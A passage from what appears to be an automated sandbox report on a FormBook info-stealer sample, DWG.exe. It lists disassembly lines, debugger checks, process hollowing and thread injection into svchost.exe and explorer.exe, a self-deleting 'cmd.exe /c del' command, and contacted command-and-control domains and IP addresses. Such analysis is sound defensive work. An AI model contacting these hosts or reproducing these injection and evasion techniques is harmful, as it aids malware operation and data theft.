          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA61C mov eax, dword ptr fs:[00000030h]5_2_00AAA61C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA61C mov eax, dword ptr fs:[00000030h]5_2_00AAA61C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31608 mov eax, dword ptr fs:[00000030h]5_2_00B31608
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8766D mov eax, dword ptr fs:[00000030h]5_2_00A8766D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3AE44 mov eax, dword ptr fs:[00000030h]5_2_00B3AE44
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3AE44 mov eax, dword ptr fs:[00000030h]5_2_00B3AE44
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]5_2_00AF7794
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]5_2_00AF7794
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]5_2_00AF7794
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A88794 mov eax, dword ptr fs:[00000030h]5_2_00A88794
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB37F5 mov eax, dword ptr fs:[00000030h]5_2_00AB37F5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A74F2E mov eax, dword ptr fs:[00000030h]5_2_00A74F2E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A74F2E mov eax, dword ptr fs:[00000030h]5_2_00A74F2E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9B73D mov eax, dword ptr fs:[00000030h]5_2_00A9B73D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9B73D mov eax, dword ptr fs:[00000030h]5_2_00A9B73D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAE730 mov eax, dword ptr fs:[00000030h]5_2_00AAE730
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0FF10 mov eax, dword ptr fs:[00000030h]5_2_00B0FF10
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0FF10 mov eax, dword ptr fs:[00000030h]5_2_00B0FF10
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA70E mov eax, dword ptr fs:[00000030h]5_2_00AAA70E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA70E mov eax, dword ptr fs:[00000030h]5_2_00AAA70E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4070D mov eax, dword ptr fs:[00000030h]5_2_00B4070D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4070D mov eax, dword ptr fs:[00000030h]5_2_00B4070D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9F716 mov eax, dword ptr fs:[00000030h]5_2_00A9F716
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8FF60 mov eax, dword ptr fs:[00000030h]5_2_00A8FF60
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48F6A mov eax, dword ptr fs:[00000030h]5_2_00B48F6A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8EF40 mov eax, dword ptr fs:[00000030h]5_2_00A8EF40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03753B7A mov eax, dword ptr fs:[00000030h]10_2_03753B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03753B7A mov eax, dword ptr fs:[00000030h]10_2_03753B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372DB60 mov ecx, dword ptr fs:[00000030h]10_2_0372DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F8B58 mov eax, dword ptr fs:[00000030h]10_2_037F8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372F358 mov eax, dword ptr fs:[00000030h]10_2_0372F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372DB40 mov eax, dword ptr fs:[00000030h]10_2_0372DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E131B mov eax, dword ptr fs:[00000030h]10_2_037E131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374DBE9 mov eax, dword ptr fs:[00000030h]10_2_0374DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037D23E3 mov ecx, dword ptr fs:[00000030h]10_2_037D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037D23E3 mov ecx, dword ptr fs:[00000030h]10_2_037D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037D23E3 mov eax, dword ptr fs:[00000030h]10_2_037D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037A53CA mov eax, dword ptr fs:[00000030h]10_2_037A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037A53CA mov eax, dword ptr fs:[00000030h]10_2_037A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]10_2_03754BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]10_2_03754BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]10_2_03754BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F5BA5 mov eax, dword ptr fs:[00000030h]10_2_037F5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03752397 mov eax, dword ptr fs:[00000030h]10_2_03752397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375B390 mov eax, dword ptr fs:[00000030h]10_2_0375B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E138A mov eax, dword ptr fs:[00000030h]10_2_037E138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03731B8F mov eax, dword ptr fs:[00000030h]10_2_03731B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03731B8F mov eax, dword ptr fs:[00000030h]10_2_03731B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037DD380 mov ecx, dword ptr fs:[00000030h]10_2_037DD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]10_2_0375138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]10_2_0375138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]10_2_0375138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0376927A mov eax, dword ptr fs:[00000030h]10_2_0376927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037DB260 mov eax, dword ptr fs:[00000030h]10_2_037DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037DB260 mov eax, dword ptr fs:[00000030h]10_2_037DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F8A62 mov eax, dword ptr fs:[00000030h]10_2_037F8A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037EEA55 mov eax, dword ptr fs:[00000030h]10_2_037EEA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037B4257 mov eax, dword ptr fs:[00000030h]10_2_037B4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]10_2_03729240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]10_2_03729240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]10_2_03729240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]10_2_03729240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]10_2_0374B236
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]10_2_0374B236
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]10_2_0374B236
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]10_2_0374B236
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]10_2_0374B236
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]10_2_0374B236
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03764A2C mov eax, dword ptr fs:[00000030h]10_2_03764A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03764A2C mov eax, dword ptr fs:[00000030h]10_2_03764A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]10_2_0374A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]10_2_03725210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03725210 mov ecx, dword ptr fs:[00000030h]10_2_03725210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]10_2_03725210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]10_2_03725210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372AA16 mov eax, dword ptr fs:[00000030h]10_2_0372AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372AA16 mov eax, dword ptr fs:[00000030h]10_2_0372AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03743A1C mov eax, dword ptr fs:[00000030h]10_2_03743A1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037EAA16 mov eax, dword ptr fs:[00000030h]10_2_037EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037EAA16 mov eax, dword ptr fs:[00000030h]10_2_037EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03738A0A mov eax, dword ptr fs:[00000030h]10_2_03738A0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03752AE4 mov eax, dword ptr fs:[00000030h]10_2_03752AE4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03752ACB mov eax, dword ptr fs:[00000030h]10_2_03752ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0373AAB0 mov eax, dword ptr fs:[00000030h]10_2_0373AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0373AAB0 mov eax, dword ptr fs:[00000030h]10_2_0373AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375FAB0 mov eax, dword ptr fs:[00000030h]10_2_0375FAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]10_2_037252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]10_2_037252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]10_2_037252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]10_2_037252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]10_2_037252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375D294 mov eax, dword ptr fs:[00000030h]10_2_0375D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375D294 mov eax, dword ptr fs:[00000030h]10_2_0375D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372B171 mov eax, dword ptr fs:[00000030h]10_2_0372B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372B171 mov eax, dword ptr fs:[00000030h]10_2_0372B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372C962 mov eax, dword ptr fs:[00000030h]10_2_0372C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B944 mov eax, dword ptr fs:[00000030h]10_2_0374B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B944 mov eax, dword ptr fs:[00000030h]10_2_0374B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375513A mov eax, dword ptr fs:[00000030h]10_2_0375513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375513A mov eax, dword ptr fs:[00000030h]10_2_0375513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]10_2_03744120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]10_2_03744120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]10_2_03744120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]10_2_03744120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03744120 mov ecx, dword ptr fs:[00000030h]10_2_03744120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]10_2_03729100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]10_2_03729100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]10_2_03729100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037B41E8 mov eax, dword ptr fs:[00000030h]10_2_037B41E8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]10_2_0372B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]10_2_0372B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]10_2_0372B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]10_2_037A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]10_2_037A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]10_2_037A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]10_2_037A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037499BF mov ecx, dword ptr fs:[00000030h]10_2_037499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037499BF mov ecx, dword ptr fs:[00000030h]10_2_037499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037499BF mov eax, dword ptr fs:[00000030h]10_2_037499BF
          Source: C:\Users\user\Desktop\DWG.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00409B40 LdrLoadDll,5_2_00409B40
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043BAD2 SetUnhandledExceptionFilter,0_2_0043BAD2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043BAE4 SetUnhandledExceptionFilter,0_2_0043BAE4

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.hcbg.online
          Source: C:\Windows\explorer.exeDomain query: www.knowsyourdream.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.187.31.159 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.216.113.38 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jntycy.com
          Source: C:\Windows\explorer.exeDomain query: www.publiccoins.online
          Source: C:\Windows\explorer.exeDomain query: www.theravewizards.com
          Source: C:\Windows\explorer.exeDomain query: www.thebrandstudiointernational.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 5.157.87.204 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\DWG.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 280000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\DWG.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DWG.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DWG.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DWG.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DWG.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\DWG.exeProcess created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.331932782.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.362308444.0000000005E10000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.365065099.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043601C GetLocalTime,GetSystemTime,GetTimeZoneInformation,0_2_0043601C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043601C GetLocalTime,GetSystemTime,GetTimeZoneInformation,0_2_0043601C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0044D2B5 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,0_2_0044D2B5

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
